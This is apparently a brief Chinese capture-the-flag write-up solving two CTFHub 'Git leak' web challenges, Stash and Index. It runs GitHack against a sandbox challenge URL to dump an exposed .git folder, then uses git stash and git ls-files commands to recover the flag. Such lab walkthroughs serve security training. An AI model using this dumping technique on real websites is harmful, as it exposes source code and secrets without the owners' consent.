Web
信息泄露
Git泄露
Stash
首先,我們先讀題,由題可知我們可以用BugScanTeam或GitHack完成該題
那么我們先開題,
好吧,他問我們flag在哪里,我怎么知道fag在哪里。
先打開GitHack
使用
py GitHack.py http://challenge-9d74518fc90c371a.sandbox.ctfhub.com:10800/.git
克隆文件
cd到克隆出來的文件夾
使用
git log
命令查看文件
先用
git stash list
查看暫存的代碼,然后使用
git stash pop
將文件拉取出來
最后使用
cat 自己的文件名(我這里是標紅的txt文件)
得到flag
Index
先開題
跟上一題一樣
cd 到生成的文件夾里
用
git log
查看文件
!!!
這里使用
git ls-files --stage
查看文件
最后使用cat命令得到flag